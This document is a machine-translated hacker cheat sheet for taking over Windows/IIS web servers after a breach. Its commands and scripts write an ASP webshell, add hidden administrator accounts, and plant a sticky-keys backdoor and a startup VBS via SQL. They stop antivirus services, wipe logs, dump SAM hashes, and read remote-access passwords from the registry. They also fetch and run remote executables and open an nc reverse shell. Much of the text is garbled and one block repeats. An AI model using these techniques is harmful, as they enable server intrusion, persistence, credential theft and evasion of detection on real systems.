Standing-path problem:
1, read the site configuration.
2, with the following VBS:
On Error Resume Next
If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then
MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"
WScript.Quit
End If
Set objservice = GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"
For Each Binds In OService.ServerBindings
Web = "{ " & Replace(Binds, ":", " } { ") & " }"
WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")
Next
WScript.Echo "Path : " & VDirObj.Path
End If
Next
3, iis_spy list (Note: the need to support ASPX, anti IISSPY approach: the activeds.dll, activeds.tlb down the right).
4, to obtain the target station directory, not directly span. Can "echo <% the Execute (Request (" cmd "))% > >> X: \ target directory \ X.asp" or "copy the script file X: \ target directory \ X.asp" as the destination directory write webshell or you can also try to type commands.
Website directory may (note: generally Hosting category):
data/htdocs.网站/网站/
CMD operating VPN-related knowledge and information:
# Allow the administrator to dial the VPN:
netsh ras set user administrator permit
# Disable administrator to dial the VPN:
netsh ras set user administrator deny
# See which users can dial VPN:
netsh ras show user
# View assign IP VPN's:
netsh ras ip show config
# Address pool allocation mode IP:
netsh ras ip set addrassign method = pool
# Address pool range from 192.168.3.1 to 192.168.3.254:
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254
Cmd, Dos SQL command to add the user's next-line method:
Administrator rights are required, in order to establish a "c: \ test.qry" file, as follows:
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
Is then performed under DOS: cmd.exe / c isql -E / U alma / P /ic:\test.qry
Alternative methods of adding users:
In deleted and not net.exe adsi outside, the new method plus users. code show as below:
js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
vbs:
Set o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
Cmd access control access control:
Command is as follows:
cacls c: /e /t /g everyone:F #c盘everyone权限
cacls "目录" /d everyone #everyone不可读,包括admin
Remarks:
Counter method, the folder security settings in the Everyone setting unreadable, if there is no security options: Tools - Folder Options - Use simple sharing can be removed.
3389 related to the following with better PR:
a, firewall TCP / IP filtering (closed: net stop policyagent & net stop sharedaccess).
b, within the network environment (lcx.exe)
c, the terminal exceeds the maximum allowed connection server (XP Run: mstsc / admin; 2003 run: mstsc / console)
1. inquiry terminal port:
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2. Turn on XP & 2003 Terminal Services:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. Change the terminal port is 2008 (hexadecimal: 0x7d8):
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4. The removal of restrictions xp & 2003 Terminal Services system firewall restrictions and IP connections:
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
BS horse PortMap function, similar LCX do forwarded. Ruoguo support ASPX, by this point forward will be hidden. (Note: The function that has been neglected in a remote corner)
Close common soft kill (to kill soft as the files you remove all permissions):
Processing metamorphosis Norton Enterprise Edition:
net stop "Symantec AntiVirus" /y
net stop "Symantec AntiVirus Definition Watcher" /y
net stop "Symantec Event Manager" /y
net stop "System Event Notification" /y
net stop "Symantec Settings Manager" /y
McAfee:
net stop "McAfee McShield"
Symantec virus log:
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs
Symantec virus backup:
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine
Nod32 virus backup:
C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine
Nod32 remove the password protection:
删除“HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID”即可
5 mounted shift back door, back door key Stickiness, alternatively SHIFT backdoor:
5 SHIFT, back door key Stickiness:
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
SHIFT replace the back door:
attrib c:\windows\system32\sethc.exe -h -r -s
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
del c:\windows\system32\sethc.exe
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h +r +s
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
Add a hidden system account:
1, execute the command: "net user admin $ 123456 / add & net localgroup administrators admin $ / add".
2, two export registry keys under the user's SAM.
3, in the user management interface in the admin $ delete, and then guide the registry backup back.
4, the use of Hacker Defender hides the relevant user registry.
MSSQL extension is installed back door:
USE master;
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
GRANT exec On xp_helpsystem TO public;
MSFTP processing server log:
In the "C: \ WINNT \ system32 \ \ MSFTPSVC1 \ LogFiles" There are at ex011120.log / ex011121.log / ex011124.log three files, delete ex0111124.log unsuccessful, display "... the original file is in use."
Of course, you can simply remove "ex011120.log / ex011121.log". And then use Notepad to open "ex0111124.log", after removing some of the contents inside, save, covering exit successfully.
When you stop "msftpsvc" service can delete "ex011124.log".
MSSQL Query Analyzer clear connection record:
MSSQL 2000 in the registry as follows:
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
Find information deleted then took over.
MSSQL 2005 is in:
C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
Anti-BT system to intercept techniques can be used to download a remote shell:
<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", s_RemoteFileUrl, False, "", ""
.Send
GetRemoteData = .ResponseBody
End With
Set Retrieval = Nothing
Set Ads = Server.CreateObject("Adodb.Stream")
With Ads
.Type = 1
.Open
.Write GetRemoteData
.SaveToFile Server.MapPath(s_LocalFileName), 2
.Cancel()
.Close()
End With
Set Ads = Nothing
End Sub
eWebEditor_SaveRemoteFile "your shell's name", "your shell'urL"
%>
Anti-BT system to intercept techniques can be used to download a remote shell, also reached hide their effects, can also be used as super-hidden back door, God horse to avoid killing webshell, swept away with all server security tools and hung up.
VNC, Radmin, PcAnywhere mention the right method:
Firstly shell reads vnc stored in the registry of the ciphertext, and then use the tool VNC4X crack.
Registry location: HKEY_LOCAL_MACHINE \ SOFTWARE \ RealVNC \ WinVNC4 \ password
Radmin is the default port 4899, first to obtain the password and port, the following location:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
Then connect with HASH version.
If we get WEBSEHLL a host. Found by searching mounted thereon PcAnywhere while preserving the directory password file is to allow our IUSER access, we can download this file to a local crack CIF, and from the machine landed server through PcAnywhere.
Save password CIF file, not PcAnywhere located in the installation directory, and the mounting PcAnywhere the installation disk:
“\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”
If PcAnywhere installed in the "D: \ program \" folder, then PcAnywhere password file is saved in: "D: \ Documents and Settings \ All Users \ Application Data \ Symantec \ pcAnywhere \" folder.
WinWebMail mention the right to add users:
web directory must be set in WinWebMail everyone permission to read and write, at the beginning of the program, find WinWebMail shortcut, then, to see the path, visit the "path \ web" mass shell, after visiting shell, is the authority system, direct put away control into the start, waiting for the next restart.
Not deleted cmd components can be directly added to the user, 7i24 web directory is writable permissions for the administrator.
1433 SA permission to build the injection point:
<%
strSQLServerName = "服务器ip"
strSQLDBUserName = "数据库帐号"
strSQLDBPassword = "数据库密码"
strSQLDBName = "数据库名称"
Set conn = server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
Dim rs, strSQL, id
Set rs = server.CreateObject("ADODB.recordset")
id = request("id")
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
rs.Close
%>
Mention the right papers:
First execution systeminfo
token vulnerability patch number KB956572
barbecue KB952004
Command line RAR packed ~ ~ *
rar a -k -r -s -m3 c:\1.rar c:\folder
System information collection script:
for window:
@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at- with atq#####
echo schtask /query
echo
echo ####task-list#############
tasklist /svc
echo
echo ####net-work infomation
ipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
echo
echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree -F
gethash inevitably kill how access to the local hash:
First Export Registry:
Windows 2000:regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
Windows 2003:reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg
Note that permissions issues, the general registry sam default directory is not accessible. It needs to be set after full control can access (login interface to note, system permissions can be ignored).
Next is simple, the exported registry, Down to the machine, introduced into the machine head to modify the registry, then the local user grasping tool hash arrested on the OK
hash remember the catch over his own account password change overnight Oh!
When GetHashes not obtain hash, it can be used to copy sam bingren to the desktop. I understand that someone is using this method virtual machine repeatedly because they do not know the password and get in! ~
vbs download by:
1:
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs
On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
create table a (cmd text):
insert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
Cmd operating skills under the directory:
List all directory d of:
for /d %i in (d:\freehost\*) do @echo %i
The only one to three letters of the name of the currently displayed folder path:
for /d %i in (???) do @echo %i
The current directory search path, the list of all EXE files in the current directory and subdirectories below:
for /r %i in (*.exe) do @echo %i
To specify the directory search path, to list all files in the current directory and subdirectories below:
for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i
This will display the contents inside a.txt, because the role / f, it will read in a.txt:
for /f %i in (c:\1.txt) do echo %i
Delims = space after the delimiter is, tokens are taken of several locations:
for /f "tokens=2 delims= " %i in (a.txt) do echo %i
Some common path of the Windows system (c disk can be replaced with d, e plate, such as the star outside the virtual host with the Chinese public was generally on the d drive):
c:\windows\php.ini
c:\boot.ini
c:\1.txt
c:\a.txt
c:\CMailServer\config.ini
c:\CMailServer\CMailServer.exe
c:\CMailServer\WebMail\index.asp
c:\program files\CMailServer\CMailServer.exe
c:\program files\CMailServer\WebMail\index.asp
C:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
C:\WINDOWS\FreeHost32.dll
C:\WINDOWS\7i24iislog4.exe
C:\WINDOWS\7i24tool.exe
c:\hzhost\databases\url.asp
c:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
C:\WINDOWS\web.config
c:\web\index.html
c:\www\index.html
c:\WWWROOT\index.html
c:\website\index.html
c:\web\index.asp
c:\www\index.asp
c:\wwwsite\index.asp
c:\WWWROOT\index.asp
c:\web\index.php
c:\www\index.php
c:\WWWROOT\index.php
c:\WWWsite\index.php
c:\web\default.html
c:\www\default.html
c:\WWWROOT\default.html
c:\website\default.html
c:\web\default.asp
c:\www\default.asp
c:\wwwsite\default.asp
c:\WWWROOT\default.asp
c:\web\default.php
c:\www\default.php
c:\WWWROOT\default.php
c:\WWWsite\default.php
C:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
c:\winnt\notepad.exe
C:\Program Files\Microsoft Office\OFFICE10\winword.exe
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
C:\Program Files\Microsoft Office\OFFICE12\winword.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\winrar\rar.exe
C:\Program Files\360\360Safe\360safe.exe
C:\Program Files\360Safe\360safe.exe
C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
c:\ravbin\store.ini
c:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
C:\Documents and Settings\All Users\Start Menu\desktop.ini
C:\Documents and Settings\Administrator\My Documents\Default.rdp
C:\Documents and Settings\Administrator\Cookies\index.dat
C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
C:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
C:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
C:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
C:\Program Files\Oracle\oraconfig\Lpk.dll
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
C:\WINDOWS\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetsrv\iisa, dmpwd\achg.asp
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\system
c:\CMailServer\config.ini
c:\program files\CMailServer\config.ini
c:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
c:\tomcat\bin\version.sh
c:\program files\tomcat6\bin\version.sh
C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
c:\Apache2\Apache2\bin\Apache.exe
c:\Apache2\bin\Apache.exe
c:\Apache2\php\license.txt
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
c:\Program Files\QQ2007\qq.exe
c:\Program Files\Tencent\, qq\User.db
c:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
c:\Program Files\Tencent\qq2009\qq.exe
c:\Program Files\Tencent\qq2008\qq.exe
c:\Program Files\Tencent\qq2010\bin\qq.exe
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
C:\Program Files\Foxmal\Foxmail.exe
C:\Program Files\Foxmal\accounts.cfg
C:\Program Files\tencent\Foxmal\Foxmail.exe
C:\Program Files\tencent\Foxmal\accounts.cfg
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
C:\Program Files\LeapFTP\LeapFTP.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
C:\Program Files\FlashFXP\FlashFXP.ini
C:\Program Files\FlashFXP\flashfxp.exe
c:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\QQGAME\readme.txt
C:\Program Files\StormII\Storm.exe
Various sites profile relative path Daquan:
/config.php
../../config.php
../config.php
../../../config.php
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
/conn.php
./conn.php
../../conn.php
../conn.php
../../../conn.php
/conn.asp
./conn.asp
../../conn.asp
../conn.asp
../../../conn.asp
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
/config/config.php
../../config/config.php
../config/config.php
../../../config/config.php
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
/config/conn.php
./config/conn.php
../../config/conn.php
../config/conn.php
../../../config/conn.php
/config/conn.asp
./config/conn.asp
../../config/conn.asp
../config/conn.asp
../../../config/conn.asp
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
/data/config.php
../../data/config.php
../data/config.php
../../../data/config.php
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/data/conn.php
./data/conn.php
../../data/conn.php
../data/conn.php
../../../data/conn.php
/data/conn.asp
./data/conn.asp
../../data/conn.asp
../data/conn.asp
../../../data/conn.asp
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/include/config.php
../../include/config.php
../include/config.php
../../../include/config.php
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/include/conn.php
./include/conn.php
../../include/conn.php
../include/conn.php
../../../include/conn.php
/include/conn.asp
./include/conn.asp
../../include/conn.asp
../include/conn.asp
../../../include/conn.asp
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/inc/config.php
../../inc/config.php
../inc/config.php
../../../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
/inc/conn.php
./inc/conn.php
../../inc/conn.php
../inc/conn.php
../../../inc/conn.php
/inc/conn.asp
./inc/conn.asp
../../inc/conn.asp
../inc/conn.asp
../../../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
/index.php
./index.php
../../index.php
../index.php
../../../index.php
/index.asp
./index.asp
../../index.asp
../index.asp
../../../index.asp
Remove TCP IP filtering:
TCP / IP filtering in three places in the registry are:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
Respectively, with the following command to export the registry key:
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
Then put in the three documents:
< "EnableSecurityFilters" = DWORD: 00000001 ">
to:
<" EnableSecurityFilters "= DWORD: 00000000"> /
the above three documents are then import the registry with the following command:
regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
Webshell mention the right tips:
Cmd path:
c:\windows\temp\cmd.exe
Nc Also at the same directory, such as a rebound cmdshell:
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
Usually not successful.
Cmd directly on the input path:
c:\windows\temp\nc.exe
Enter the command:
-vv ip 999 -e c:\windows\temp\cmd.exe
We were able to succeed. . This is not the point
We usually perform pr.exe or Churrasco.exe also need to be successful in accordance with the above method.
Command line call RAR package:
rar a -k -r -s -m3 c:\1.rar c:\folde
After reading the Windows version, the Linux version of Oh, do not miss